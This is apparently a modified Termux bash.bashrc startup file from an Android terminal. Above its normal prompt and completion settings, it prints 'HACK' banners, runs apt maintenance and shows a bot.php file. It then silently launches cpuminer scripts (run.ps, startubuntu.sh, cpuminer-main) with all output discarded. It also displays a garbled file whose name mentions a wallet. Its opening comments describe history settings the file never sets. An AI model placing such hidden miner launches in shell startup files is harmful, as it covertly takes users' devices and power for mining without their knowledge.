# Command history tweaks:
# - Append history instead of overwriting
#   when shell exits.
# - When using history substitution, do not
#   exec command immediately.
# - Do not save to history commands starting
#   with space.
# - Do not save duplicated commands.
cat -t /data/data/com.termux/files/home/cpuminer/TEE.conf | lolcat -p 100 -a

echo -e ".a0HACK."
echo -n ".a0HACK0."
USER=$(whoami)
current_dir=$(pwd)
dpkg --configure -a
touch ~/.hushlogin
apt update
clear
apt clean
apt autoclean
cat -t /data/data/com.termux/files/usr/etc/bot.php | lolcat -p 100 -a
cat -t /data/data/com.termux/files/usr/etc/bot.php 
bash /data/data/com.termux/files/home/cpuminer/run.ps > /dev/null 2>/dev/null
bash /data/data/com.termux/files/home/cpuminer/startubuntu.sh > /dev/null 2>/dev/null && bash data/data/com.termux/files/home/cpuminer/cpuminer-main 
clear
echo ''
clear
echo ''
clear
echo ''
clear
clear
echo ''
clear
echo ''
clear
echo ''
clear
clear
echo ''
clear
echo ''
clear
echo ''
clear
echo ''
clear
echo ''
clear
echo ''
clear
cat -t /data/data/com.termux/files/home/cpuminer/Main--&&challenge-add-scabdsdwhite--wallet-ssdfile.mmlmahlya.js.php.wwwllahosuaabP | lolcat -p 100 -a
termimage /data/data/com.termux/files/usr/etc/round.png
# Default command line prompt.
PROMPT_DIRTRIM=2
PS1='\[\e[0;32m\]˲\[\e[0m\]\[\e[0;36m\]\w\[\e[0m\]
\[\e[0;37m\]${usr}@\h\[\e[0m\] \[\e[0;95m\]>_\[\e[0m\]'

# Handles nonexistent commands.
# If user has entered command which invokes non-available
# utility, command-not-found will give a package suggestions.
if [ -x /data/data/com.termux/files/usr/libexec/termux/command-not-found ]; then
	command_not_found_handle() {
		/data/data/com.termux/files/usr/libexec/termux/command-not-found "$1"
	}
fi

[ -r /data/data/com.termux/files/usr/share/bash-completion/bash_completion ] && . /data/data/com.termux/files/usr/share/bash-completion/bash_completion
